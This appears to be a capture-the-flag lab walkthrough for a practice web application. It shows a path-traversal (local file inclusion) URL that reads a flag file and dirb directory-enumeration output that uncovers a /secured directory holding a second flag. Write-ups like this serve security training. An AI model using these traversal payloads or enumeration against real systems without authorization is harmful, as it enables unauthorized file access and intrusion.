In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.
Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.
Useful wordlists:
/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
Attacker IP: 192.185.125.2
Victim IP: target.ine.local - 192.185.125.3
Flags to Capture:
We first investigate the website to see what we can enumerate passively. After digging around the usual areas we don’t find anything so we we decide to try an LFI attack. Entering the following below (in red in the URL) should lead us to our first flag.
<http://target.ine.local/view_file?file=../../flag.txt>
FLAG1_99552bf4c4984939a4fec71d81f2e234
This sounds like we should perform some domain brute forcing to see what we come across. After performing a basic dirb search against the target URL we find a /secured directory to investigate.
---- Scanning URL: <http://target.ine.local/> ----
+ <http://target.ine.local/about> (CODE:200|SIZE:2858)
+ <http://target.ine.local/login> (CODE:200|SIZE:3377)
+ <http://target.ine.local/logout> (CODE:302|SIZE:189)
+ <http://target.ine.local/secured> (CODE:308|SIZE:251)
After seeing this it should tell us we just need to add the txt file to the url to access it.
FLAG2_639ed32311044b3485df41795ed337fb